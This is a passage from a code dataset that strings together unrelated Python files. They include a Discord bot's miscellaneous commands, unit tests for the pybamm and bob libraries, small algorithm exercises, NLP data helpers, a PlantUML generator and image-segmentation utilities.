unit_plural),\n )\n\n for i in range(times):\n cat_url = requests.get(\"http://aws.random.cat/meow\").json()[\"file\"]\n await self.say(m.channel, cat_url)\n if i == times - 1:\n await self.say(m.channel, \"Finished sending cats!\")\n break\n await 
asyncio.sleep(unit_time)\n\n await self.auth_function(inner)(message, owner_auth=True)\n\n async def troll_url(self, message):\n await self.say(\n message.channel, MiscModule._return_troll(message.content.split()[1])\n )\n await self.delete(message)\n\n async def invite(self, message):\n await self.say(\n message.channel,\n \"Add me to your server! Click here: {}\".format(\n cakebot_config.NORMAL_INVITE_LINK\n ),\n )\n\n async def gen_google_link(self, message):\n url = \"https://www.google.com/#q=\" + \"+\".join(message.content.split()[1:])\n await self.say(message.channel, url)\n\n @staticmethod\n def _parse_duration_str(args):\n # Used for !timedcats. May be extended for use with other commands in the future.\n # Returns a tuple (times, duration_str)\n # Defaults to 5 m if no duration string is given\n times = 5\n duration_str = \"m\"\n\n if len(args) > 1:\n arg_times = args[1]\n if is_integer(arg_times):\n if int(arg_times) <= 60:\n times = int(arg_times)\n\n if len(args) > 2:\n arg_duration = args[2]\n if arg_duration in misc_consts.time_map:\n duration_str = arg_duration\n return times, duration_str\n\n @staticmethod\n def _select_repl(char):\n try:\n weight = 8\n key = int(random.random() * (len(misc_consts.repl_dict[char]) + weight))\n if key < weight + 1:\n return misc_consts.repl_dict[char][\n 0\n ] # Below weight, key equals 0 (key for first/default character)\n else:\n return misc_consts.repl_dict[char][key - weight]\n except KeyError: # Return original char if char not found in dict\n return char\n\n @staticmethod\n def _return_troll(url):\n prefix = \"\"\n if \"https://\" in url:\n prefix = \"https://\"\n elif \"http://\" in url:\n prefix = \"http://\"\n return prefix + \"\".join(\n [MiscModule._select_repl(x) for x in url[len(prefix) :]]\n )\n\n command_handlers = {\n \"!timedcats\": timed_cats,\n \"!trollurl\": troll_url,\n \"!invite\": invite,\n \"!google\": gen_google_link,\n }\n\n help_entries = 
misc_help.help_entries\n","sub_path":"bot/modules/misc/MiscModule.py","file_name":"MiscModule.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"272499212","text":"from random import randint\n\n\ndef binary_search(array, key_value, left=0, right=None):\n if right is None:\n right = len(array)\n\n middle = (left + right) // 2\n while array[middle] != key_value and left <= right:\n if array[middle] < key_value:\n left = middle+1\n else:\n right = middle-1\n\n middle = (left + right) // 2\n\n return (True, middle) if not (left > right) else (False, middle+1)\n\n\nlst = [randint(10, 50) for _ in range(25)]\nprint(lst)\n\nlst.sort()\nprint(lst)\n\nkey = int(input('please enter key: '))\nflag, idx = binary_search(lst, key)\nprint('Flag:', flag)\nprint('Index:', idx)\n\nif flag:\n print('Yes, index =', idx)\nelse:\n print('No')\n lst.insert(idx, key)\n print(lst)\n\n","sub_path":"Lesson_10/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39585927","text":"import pybamm\nimport unittest\nimport numpy as np\n\n\nclass TestQuickPlot(unittest.TestCase):\n def test_simple_ode_model(self):\n model = pybamm.SimpleODEModel()\n geometry = model.default_geometry\n param = model.default_parameter_values\n param.process_model(model)\n param.process_geometry(geometry)\n mesh = pybamm.Mesh(geometry, model.default_submesh_types, model.default_var_pts)\n disc = pybamm.Discretisation(mesh, model.default_spatial_methods)\n disc.process_model(model)\n solver = model.default_solver\n t_eval = np.linspace(0, 2, 100)\n solution = solver.solve(model, t_eval)\n quick_plot = pybamm.QuickPlot(model, mesh, solution)\n quick_plot.plot(0)\n\n # update the axis\n new_axis = [0, 0.5, 0, 1]\n quick_plot.axis.update({(\"a\",): new_axis})\n 
self.assertEqual(quick_plot.axis[(\"a\",)], new_axis)\n\n # and now reset them\n quick_plot.reset_axis()\n self.assertNotEqual(quick_plot.axis[(\"a\",)], new_axis)\n\n # check dynamic plot loads\n quick_plot.dynamic_plot(testing=True)\n\n quick_plot.update(0.01)\n\n # Test with different output variables\n quick_plot = pybamm.QuickPlot(model, mesh, solution, [\"b broadcasted\"])\n self.assertEqual(len(quick_plot.axis), 1)\n quick_plot.plot(0)\n\n quick_plot = pybamm.QuickPlot(\n model,\n mesh,\n solution,\n [[\"a\", \"a\"], [\"b broadcasted\", \"b broadcasted\"], \"c broadcasted\"],\n )\n self.assertEqual(len(quick_plot.axis), 3)\n quick_plot.plot(0)\n\n # update the axis\n new_axis = [0, 0.5, 0, 1]\n var_key = (\"c broadcasted\",)\n quick_plot.axis.update({var_key: new_axis})\n self.assertEqual(quick_plot.axis[var_key], new_axis)\n\n # and now reset them\n quick_plot.reset_axis()\n self.assertNotEqual(quick_plot.axis[var_key], new_axis)\n\n # check dynamic plot loads\n quick_plot.dynamic_plot(testing=True)\n\n quick_plot.update(0.01)\n\n # Test longer name\n model.variables[\"Variable with a very long name\"] = model.variables[\"a\"]\n quick_plot = pybamm.QuickPlot(model, mesh, solution)\n quick_plot.plot(0)\n\n # Test errors\n with self.assertRaisesRegex(ValueError, \"mismatching variable domains\"):\n pybamm.QuickPlot(model, mesh, solution, [[\"a\", \"b broadcasted\"]])\n model.variables[\"3D variable\"] = disc.process_symbol(\n pybamm.Broadcast(1, [\"negative particle\"])\n )\n with self.assertRaisesRegex(NotImplementedError, \"cannot plot 3D variables\"):\n pybamm.QuickPlot(model, mesh, solution, [\"3D variable\"])\n\n def test_loqs_spm_base(self):\n t_eval = np.linspace(0, 0.01, 2)\n\n # SPM\n options = {\"thermal\": None}\n for model in [pybamm.lithium_ion.SPM(options), pybamm.lead_acid.LOQS()]:\n geometry = model.default_geometry\n param = model.default_parameter_values\n param.process_model(model)\n param.process_geometry(geometry)\n mesh = pybamm.Mesh(\n 
geometry, model.default_submesh_types, model.default_var_pts\n )\n disc = pybamm.Discretisation(mesh, model.default_spatial_methods)\n disc.process_model(model)\n solver = model.default_solver\n solution = solver.solve(model, t_eval)\n pybamm.QuickPlot(model, mesh, solution)\n\n def test_failure(self):\n with self.assertRaisesRegex(TypeError, \"'models' must be\"):\n pybamm.QuickPlot(1, None, None)\n with self.assertRaisesRegex(TypeError, \"'solutions' must be\"):\n pybamm.QuickPlot(pybamm.BaseModel(), None, 1)\n with self.assertRaisesRegex(ValueError, \"must provide the same\"):\n pybamm.QuickPlot(\n pybamm.BaseModel(),\n None,\n [pybamm.Solution(0, 0, \"\"), pybamm.Solution(0, 0, \"\")],\n )\n\n\nif __name__ == \"__main__\":\n print(\"Add -v for more debug output\")\n import sys\n\n if \"-v\" in sys.argv:\n debug = True\n pybamm.settings.debug_mode = True\n unittest.main()\n","sub_path":"tests/unit/test_quick_plot.py","file_name":"test_quick_plot.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442283595","text":"import pandas as pd\nimport time\nfrom tqdm import tqdm\nimport operator\n\ndf = pd.read_excel('review.xlsx')\n\nassumed_number_of_restaurants = 1000\n\nassigned_competitor_average_rating = 3.5\n\ncool_score = 0\n\nrestaurants_ratings = dict()\n\nreview_scores = dict()\noptimum_review_scores = dict()\n\nridlist = df['rid'].tolist() \ndata_lines = len(ridlist)\n\ndef get_user_score(number_of_reviews, rating):\n score = number_of_reviews * rating\n return score\n\ndef analyze(n):\n for i in tqdm(range(data_lines)):\n rid = df['rid'][i]\n # numberOfFriends = int(df['user_numberoffriends'][i])\n numberOfReviews = int(df['user_numberofreviews'][i])\n rating = int(df['rating'][i])\n # no_of_useful = int(df['numberofuseful'][i])\n # no_of_funny = int(df['numberoffunny'][i])\n # no_of_cool = int(df['numberofcool'][i])\n\n user_score = 
get_user_score(numberOfReviews, rating)\n optimum_user_score = get_user_score(numberOfReviews,5)\n if rid in review_scores:\n review_scores[rid] += user_score\n optimum_review_scores[rid] += optimum_user_score\n else:\n review_scores[rid] = user_score\n optimum_review_scores[rid] = optimum_user_score\n\n for rid in review_scores:\n rating = (review_scores[rid]/optimum_review_scores[rid])*5\n restaurants_ratings[rid] = float(\"{0:.2f}\".format(rating))\n top_competitors = dict(sorted(restaurants_ratings.items(), key=operator.itemgetter(1), reverse=True)[:n])\n return restaurants_ratings,top_competitors\n ","sub_path":"review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582701456","text":"from tokens import *\n\nimport os\n\n\nclass writeUml:\n\n def __init__(self,sourceCode):\n self.classDict = Lexer(sourceCode).classDict()\n self.file = 'UML.txt'\n\n\n def writeFile(self):\n file = open(self.file,'w')\n file.write(\"title My code\\nscale 2\\n\")\n for classname in self.classDict:\n Class = \"class \"+classname+\" {\"\n file.write(Class+'\\n')\n variables = self.classDict[classname]['class Variables']\n for var in variables:\n datatype,var = var.split()\n variable = \"\\t+ \"+datatype+\" : \"+var\n file.write(variable+\"\\n\")\n methods = self.classDict[classname]['class methods']\n for method in methods:\n datatype,var = method.split()\n method = \"\\t+ \"+datatype+\" : \"+var\n file.write(method+\"\\n\")\n file.write(\"}\\n\")\n for classname in self.classDict:\n if self.classDict[classname]['Inherited'] != \"Base\":\n Classname = self.classDict[classname]\n inherited = self.classDict[classname]['Inherited']\n inherit = inherited+\" <|-- \"+classname\n file.write(inherit+'\\n')\n file.close()\n \n\n\n\n\n def run(self):\n self.writeFile()\n os.system(\"python -m plantuml UML.txt\")\n\n###################################################\n# 
{\n# class : \n# { \n# classname : student\n# Inhertited : Base\n# classVariables :\n# { \n# string : usn\n# string : name\n# string : branch\n# long : phone\n# } \n# classMethods : \n# { \n# void : read(void)\n# void : print(void)\n# } \n# }\n# }\n############################################################","sub_path":"PlantumlTxt.py","file_name":"PlantumlTxt.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"332204537","text":"#!/usr/bin/env python\n# Copyright 2017 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport itertools\nimport json\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport unittest\n\nTHIS_DIR = os.path.dirname(__file__)\n\nsys.path.insert(\n 0, os.path.abspath(os.path.join(THIS_DIR, '..', '..', '..', 'unittests')))\nimport test_env\n\nsys.path.insert(\n 0, os.path.abspath(os.path.join(THIS_DIR, '..', 'resources')))\nimport standard_isolated_script_merge\n\nfrom testing_support import auto_stub\n\n\nclass StandardIsolatedScriptMergeTest(auto_stub.TestCase):\n\n def setUp(self):\n self.merge_test_results_args = []\n def mock_merge_test_results(results_list):\n self.merge_test_results_args.append(results_list)\n return {\n 'foo': [\n 'bar',\n 'baz',\n ],\n }\n\n self.mock(\n standard_isolated_script_merge.results_merger,\n 'merge_test_results',\n mock_merge_test_results)\n\n self.temp_dir = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.temp_dir)\n super(StandardIsolatedScriptMergeTest, self).tearDown()\n\n def test_simple(self):\n\n results = [\n {\n 'result0': ['bar', 'baz'],\n },\n {\n 'result1': {'foo': 'bar'}\n }\n ]\n json_files = [\n os.path.join(self.temp_dir, 'input0.json'),\n os.path.join(self.temp_dir, 'input1.json')\n ]\n\n for result, json_file in itertools.izip(results, json_files):\n with open(json_file, 
'w') as f:\n json.dump(result, f)\n\n output_json_file = os.path.join(self.temp_dir, 'output.json')\n exit_code = standard_isolated_script_merge.StandardIsolatedScriptMerge(\n output_json_file, json_files)\n\n self.assertEquals(0, exit_code)\n self.assertEquals(\n [\n [\n {\n 'result0': [\n 'bar', 'baz',\n ],\n },\n {\n 'result1': {\n 'foo': 'bar',\n },\n }\n ],\n ],\n self.merge_test_results_args)\n\n def test_no_jsons(self):\n json_files = []\n output_json_file = os.path.join(self.temp_dir, 'output.json')\n exit_code = standard_isolated_script_merge.StandardIsolatedScriptMerge(\n output_json_file, json_files)\n\n self.assertEquals(0, exit_code)\n self.assertEquals([[]], self.merge_test_results_args)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"scripts/slave/recipe_modules/swarming/unittests/standard_isolated_script_merge_test.py","file_name":"standard_isolated_script_merge_test.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215468516","text":"from haha import get_url\nfrom urls import url_list\n\ndef main(url):\n result = get_url.delay(url)\n return result\n\ndef run():\n with open('./url.txt', 'r') as f:\n for url in f.readlines():\n main(url.strip('\\n'))\n\nif __name__ == '__main__':\n run()","sub_path":"run_haha.py","file_name":"run_haha.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639605415","text":"import re\r\n\r\ndef is_balanced(text):\r\n opening = '([{'\r\n closing = ')]}'\r\n stack = []\r\n for char in text:\r\n if char in opening:\r\n stack.append(opening.index(char))\r\n elif char in closing:\r\n if stack and stack[-1] == closing.index(char):\r\n stack.pop()\r\n else:\r\n return False\r\n return (not stack)\r\n\r\ndef max_balanced(text):\r\n #Charcheck\r\n if re.sub(r\"[a-zA-Z{}\\[\\]()]\", \"\", text): return ('Incorrect 
characters! Accept only brackets and letters')\r\n\r\n #Const\r\n string = text+text\r\n opening = '([{'\r\n closing = ')]}'\r\n error = 0\r\n s_len = len(string)\r\n ss_max = 0\r\n x = 0\r\n y = 0\r\n result = ''\r\n\r\n #First infinite check\r\n new = re.sub(r\"[a-zA-Z]\", \"\", string)\r\n if new[0] in closing and new[len(new)-1] in opening and is_balanced(new[1:len(new)-1]):\r\n if closing.index(new[0]) == opening.index(new[len(new)-1]): error = 1\r\n\r\n #Find max substring\r\n if re.sub(r\"[a-zA-Z{}\\[\\]()]\", \"\", s1): print('Incorrect characters! Accept only brackets and letters')\r\n while x <= s_len and error == 0:\r\n substring = string[x:y]\r\n ss_len = len(substring)\r\n if is_balanced(substring):\r\n if ss_len >= ss_max:\r\n ss_max = ss_len\r\n result = substring\r\n y = y+1\r\n if y > s_len: \r\n x = x+1\r\n y = 0\r\n\r\n #Second infinite check\r\n if result:\r\n if error == 1 or result == string or is_balanced(string.split(result)[1] + string.split(result)[0]): result = 'Infinite'\r\n\r\n return result\r\n\r\n#pytest\r\ndef test_is_balanced():\r\n assert is_balanced('{x[x]x(x)}') == True\r\n assert is_balanced(']x[x]') == False\r\n\r\ndef test_max_balanced():\r\n assert max_balanced('{x[x]x(x)}') == 'Infinite'\r\n assert max_balanced('()}[(x)]{') == 'Infinite'\r\n assert max_balanced('}[(x)]{()') == 'Infinite'\r\n assert max_balanced(']x}[x]') == '[x]'\r\n assert max_balanced('xx}x({') == '{xx}x'\r\n assert max_balanced(')x)x(x[')\r\n\r\n# The End\r\ns1 = 'xx}x({xxxxx'\r\nprint(max_balanced(s1))","sub_path":"Task.py","file_name":"Task.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346298367","text":"import numpy as np\r\nimport re\r\n\r\n\r\ndef load_word_embedding_matrix(embedding_path, vocab, dim):\r\n word_vocab = []\r\n embedding_matrix = []\r\n word_vocab.extend(['UNK'])\r\n embedding_matrix.append(np.random.uniform(-1.0, 1.0, (1, 
dim))[0])\r\n print('Reading embeddings...')\r\n with open(embedding_path, 'r') as f:\r\n for line in f:\r\n if line.split()[0] in vocab:\r\n word_vocab.append(line.split()[0])\r\n embedding_matrix.append([float(i) for i in line.split()[1:]])\r\n return {'word_vocab': word_vocab, 'Embedding_matrix': np.reshape(embedding_matrix, [-1, dim]).astype(np.float32)}\r\n\r\n\r\ndef clean_str(string):\r\n \"\"\"\r\n Tokenization/string cleaning for all datasets except for SST.\r\n Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py\r\n \"\"\"\r\n string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string)\r\n string = re.sub(r\"\\'s\", \" \\'s\", string)\r\n string = re.sub(r\"\\'ve\", \" \\'ve\", string)\r\n string = re.sub(r\"n\\'t\", \" n\\'t\", string)\r\n string = re.sub(r\"\\'re\", \" \\'re\", string)\r\n string = re.sub(r\"\\'d\", \" \\'d\", string)\r\n string = re.sub(r\"\\'ll\", \" \\'ll\", string)\r\n string = re.sub(r\",\", \" , \", string)\r\n string = re.sub(r\"!\", \" ! \", string)\r\n string = re.sub(r\"\\(\", \" \\( \", string)\r\n string = re.sub(r\"\\)\", \" \\) \", string)\r\n string = re.sub(r\"\\?\", \" \\? 
\", string)\r\n string = re.sub(r\"\\s{2,}\", \" \", string)\r\n return string.strip().lower()\r\n\r\n\r\ndef removezero(x, y):\r\n nozero = np.nonzero(y)\r\n print('removezero', np.shape(nozero)[-1], len(y))\r\n\r\n if np.shape(nozero)[-1] == len(y):\r\n return np.array(x), np.array(y)\r\n\r\n y = np.array(y)[nozero]\r\n x = np.array(x)\r\n x = x[nozero]\r\n return x, y\r\n\r\n\r\ndef read_file_lines(filename, from_size, line_num):\r\n i = 0\r\n text = []\r\n end_num = from_size + line_num\r\n for line in open(filename):\r\n if i >= from_size:\r\n text.append(line.strip())\r\n i += 1\r\n if i >= end_num:\r\n return text\r\n return text\r\n\r\n\r\ndef load_vocab(doc_list):\r\n vocab = []\r\n for docs in doc_list:\r\n for sentence in docs:\r\n for word in sentence.split():\r\n vocab.append(word.lower())\r\n vocab = list(set(vocab))\r\n return vocab\r\n\r\n\r\ndef load_data_and_labels(filepath):\r\n \"\"\"\r\n Loads data from files, splits the data into words and generates labels.\r\n Returns split sentences and labels.\r\n \"\"\"\r\n\r\n one_hot_labels = []\r\n citation = []\r\n title = []\r\n content = []\r\n with open(filepath, 'r', encoding=\"utf-8\") as f:\r\n for line in f:\r\n parts = line.split('\\t')\r\n if len(parts) != 4:\r\n continue\r\n citation.append(parts[0])\r\n title.append(parts[1])\r\n content.append(parts[2])\r\n if parts[3].startswith('0'):\r\n one_hot_labels.append([0, 1])\r\n else:\r\n one_hot_labels.append([1, 0])\r\n return [citation, title, content, np.array(one_hot_labels)]\r\n\r\n\r\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\r\n \"\"\"\r\n Generates a batch iterator for a dataset.\r\n \"\"\"\r\n data = np.array(data)\r\n data_size = len(data)\r\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\r\n for epoch in range(num_epochs):\r\n # Shuffle the data at each epoch\r\n if shuffle:\r\n shuffle_indices = np.random.permutation(np.arange(data_size))\r\n shuffled_data = data[shuffle_indices]\r\n else:\r\n 
shuffled_data = data\r\n for batch_num in range(num_batches_per_epoch):\r\n start_index = batch_num * batch_size\r\n end_index = min((batch_num + 1) * batch_size, data_size)\r\n\r\n # print('epoch = %d,batch_num = %d,start = %d,end_idx = %d' % (epoch,batch_num,start_index,end_index))\r\n yield shuffled_data[start_index:end_index]\r\n\r\n\r\ndef get_text_idx(text, shape_word_vocab, max_document_length):\r\n text_array = np.zeros([len(text), max_document_length], dtype=np.int32)\r\n symbols = {0: 'UNK'}\r\n print('int to vocab')\r\n int_to_vocab = {}\r\n for index_no, word in enumerate(shape_word_vocab):\r\n int_to_vocab[index_no] = word\r\n int_to_vocab.update(symbols)\r\n vocab_to_int = {word: index_no for index_no, word in int_to_vocab.items()}\r\n for i, x in enumerate(text):\r\n words = x.split(\" \")\r\n count = 1\r\n for j, w in enumerate(words):\r\n if count > max_document_length:\r\n break\r\n else:\r\n if w in vocab_to_int:\r\n text_array[i, j] = vocab_to_int[w]\r\n else:\r\n text_array[i, j] = vocab_to_int['UNK']\r\n count = count + 1\r\n return text_array\r\n\r\n\r\nif __name__ == \"__main__\":\r\n x_text, y = load_data_and_labels('F:\\\\pycharm project\\\\CitationRec-master\\\\data\\\\cutclean_label_corpus10000.txt')\r\n print(len(x_text))\r\n","sub_path":"chapter5/net1/data_helper_net1.py","file_name":"data_helper_net1.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542430619","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Laurent El Shafey \n# Sat Sep 1 9:43:00 2012 +0200\n#\n# Copyright (C) 2011-2013 Idiap Research Institute, Martigny, Switzerland\n\n\"\"\"Test trainer package\n\"\"\"\n\nimport os, sys\nimport unittest\nimport bob\nimport random\nimport numpy\n\nclass CGLogRegTest(unittest.TestCase):\n \"\"\"Performs various tests for Linear Logistic Regression.\"\"\"\n\n def test01_cglogreg(self):\n\n # Tests our LLR Trainer.\n 
positives = numpy.array([\n [1.,1.2,-1.],\n [2.,2.1,2.2],\n [3.,2.9,3.1],\n [4.,3.7,4.],\n [5.,5.2,4.9],\n [6.,6.1,5.9],\n [7.,7.,7.3],\n ], dtype='float64')\n\n negatives = numpy.array([\n [-10.,-9.2,-1.],\n [-5.,-4.1,-0.5],\n [-10.,-9.9,-1.8],\n [-5.,-5.4,-0.3],\n [-10.,-9.3,-0.7],\n [-5.,-4.5,-0.5],\n [-10.,-9.7,-1.2],\n [-5.,-4.8,-0.2],\n ], dtype='float64')\n\n # Expected trained machine\n #weights_ref= numpy.array([[13.5714], [19.3997], [-0.6432]])\n weights_ref= numpy.array([[1.75536], [2.69297], [-0.54142]])\n #bias_ref = numpy.array([55.3255])\n bias_ref = numpy.array([7.26999])\n\n # Features and expected outputs of the trained machine\n feat1 = numpy.array([1.,2.,3.])\n #out1 = 105.7668\n out1 = 12.78703\n feat2 = numpy.array([2.,3.,4.])\n #out2 = 138.0947\n out2 = 16.69394\n\n\n # Trains a machine (method 1)\n T = bob.trainer.CGLogRegTrainer(0.5, 1e-5, 30)\n machine1 = T.train(negatives,positives)\n\n # Makes sure results are good\n self.assertTrue( (abs(machine1.weights - weights_ref) < 2e-4).all() )\n self.assertTrue( (abs(machine1.biases - bias_ref) < 2e-4).all() )\n self.assertTrue( abs(machine1(feat1) - out1) < 2e-4 )\n self.assertTrue( abs(machine1(feat2) - out2) < 2e-4 )\n\n # Trains a machine (method 2)\n machine2 = bob.machine.LinearMachine()\n T.train(machine2, negatives, positives)\n\n # Makes sure results are good\n self.assertTrue( (abs(machine2.weights - weights_ref) < 2e-4).all() )\n self.assertTrue( (abs(machine2.biases - bias_ref) < 2e-4).all() )\n self.assertTrue( abs(machine2(feat1) - out1) < 2e-4 )\n self.assertTrue( abs(machine2(feat2) - out2) < 2e-4 )\n\n # Expected trained machine (with regularization)\n weights_ref= numpy.array([[0.54926], [0.58304], [0.06558]])\n bias_ref = numpy.array([0.27897])\n\n # Trains a machine (method 1)\n T = bob.trainer.CGLogRegTrainer(0.5, 1e-5, 30, 1.)\n machine1 = T.train(negatives, positives)\n\n # Makes sure results are good\n self.assertTrue( (abs(machine1.weights - weights_ref) < 2e-4).all() 
)\n self.assertTrue( (abs(machine1.biases - bias_ref) < 2e-4).all() )\n\n\n def test02_cglogreg_norm(self):\n # read some real test data;\n # for toy examples the results are quite different...\n\n pos1 = bob.io.load(bob.test.utils.datafile('positives_isv.hdf5', 'bob.trainer.test', 'data'))\n neg1 = bob.io.load(bob.test.utils.datafile('negatives_isv.hdf5', 'bob.trainer.test', 'data'))\n\n pos2 = bob.io.load(bob.test.utils.datafile('positives_lda.hdf5', 'bob.trainer.test', 'data'))\n neg2 = bob.io.load(bob.test.utils.datafile('negatives_lda.hdf5', 'bob.trainer.test', 'data'))\n\n negatives = numpy.vstack((neg1, neg2)).T\n positives = numpy.vstack((pos1, pos2)).T\n\n # Train the machine after mean-std norm\n T = bob.trainer.CGLogRegTrainer(0.5, 1e-10, 10000, mean_std_norm=True)\n machine = T.train(negatives,positives)\n\n # assert that mean and variance are correct\n mean = numpy.mean(numpy.vstack((positives, negatives)), 0)\n std = numpy.std(numpy.vstack((positives, negatives)), 0)\n\n self.assertTrue( (abs(machine.input_subtract - mean) < 1e-10).all() )\n self.assertTrue( (abs(machine.input_divide - std) < 1e-10).all() )\n\n # apply it to test data\n test1 = [1., -50.]\n test2 = [0.5, -86.]\n\n res1 = machine(test1)\n res2 = machine(test2)\n\n # normalize training data\n pos = numpy.vstack([(positives[i] - mean) / std for i in range(len(positives))])\n neg = numpy.vstack([(negatives[i] - mean) / std for i in range(len(negatives))])\n\n # re-train the machine; should give identical results\n T.mean_std_norm = False\n machine = T.train(neg, pos)\n machine.input_subtract = mean\n machine.input_divide = std\n\n # assert that the result is the same\n self.assertTrue( abs(machine(test1) - res1) < 1e-10 )\n self.assertTrue( abs(machine(test2) - res2) < 1e-10 )\n\n if not bob.core.is_debug():\n # try the training without normalization\n machine = T.train(negatives, positives)\n # check that the results are at least approximately equal\n # Note: lower values for epsilon and 
higher number of iterations improve the stability)\n self.assertTrue( abs(machine(test1) - res1) < 1e-3 )\n self.assertTrue( abs(machine(test2) - res2) < 1e-3 )\n\n\n","sub_path":"python/bob/trainer/test/test_cglogreg.py","file_name":"test_cglogreg.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"594409800","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('stories', '0006_auto_20150601_1058'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='comment',\n name='comment_type',\n field=models.CharField(choices=[('1', 'Comment'), ('2', 'Review')], default='Comment', max_length=64),\n ),\n ]\n","sub_path":"migtations/stories/migrations/0007_comment_comment_type.py","file_name":"0007_comment_comment_type.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544522915","text":"\n\n#calss header\nclass _CONTRAPTION():\n\tdef __init__(self,): \n\t\tself.name = \"CONTRAPTION\"\n\t\tself.definitions = [u'a device or machine that looks awkward or old-fashioned, especially one that you do not know how to use: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_contraption.py","file_name":"_contraption.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284534778","text":"from IPython.display import clear_output, Image, display \r\nimport os\r\nimport cv2\r\nimport sys\r\nfrom time import time\r\nimport glob\r\nimport six\r\nimport PIL\r\nfrom PIL import ImageOps 
\r\nimport random\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\n\r\nclass_colors = [(random.randint(0, 255), random.randint(\r\n 0, 255), random.randint(0, 255)) for _ in range(5000)]\r\n \r\n# Default IMAGE_ORDERING = channels_last\r\nIMAGE_ORDERING = \"channels_last\"\r\n\r\n\r\ndef get_colored_segmentation_image(seg_arr, n_classes, colors=class_colors):\r\n output_height = seg_arr.shape[0]\r\n output_width = seg_arr.shape[1]\r\n\r\n seg_img = np.zeros((output_height, output_width, 3))\r\n\r\n for c in range(n_classes):\r\n seg_arr_c = seg_arr[:, :] == c\r\n seg_img[:, :, 0] += ((seg_arr_c)*(colors[c][0])).astype('uint8')\r\n seg_img[:, :, 1] += ((seg_arr_c)*(colors[c][1])).astype('uint8')\r\n seg_img[:, :, 2] += ((seg_arr_c)*(colors[c][2])).astype('uint8')\r\n\r\n return seg_img\r\n\r\n\r\ndef get_legends(class_names, colors=class_colors):\r\n\r\n n_classes = len(class_names)\r\n legend = np.zeros(((len(class_names) * 25) + 25, 125, 3),\r\n dtype=\"uint8\") + 255\r\n\r\n class_names_colors = enumerate(zip(class_names[:n_classes],\r\n colors[:n_classes]))\r\n\r\n for (i, (class_name, color)) in class_names_colors:\r\n color = [int(c) for c in color]\r\n cv2.putText(legend, class_name, (5, (i * 25) + 17),\r\n cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 0), 1)\r\n cv2.rectangle(legend, (100, (i * 25)), (125, (i * 25) + 25),\r\n tuple(color), -1)\r\n\r\n return legend\r\n\r\n\r\ndef overlay_seg_image(inp_img, seg_img):\r\n orininal_h = inp_img.shape[0]\r\n orininal_w = inp_img.shape[1]\r\n seg_img = cv2.resize(seg_img, (orininal_w, orininal_h), interpolation=cv2.INTER_NEAREST)\r\n\r\n fused_img = (inp_img/2 + seg_img/2).astype('uint8')\r\n return fused_img\r\n\r\n\r\ndef concat_lenends(seg_img, legend_img):\r\n\r\n new_h = np.maximum(seg_img.shape[0], legend_img.shape[0])\r\n new_w = seg_img.shape[1] + legend_img.shape[1]\r\n\r\n out_img = np.zeros((new_h, new_w, 3)).astype('uint8') + legend_img[0, 0, 0]\r\n\r\n out_img[:legend_img.shape[0], : 
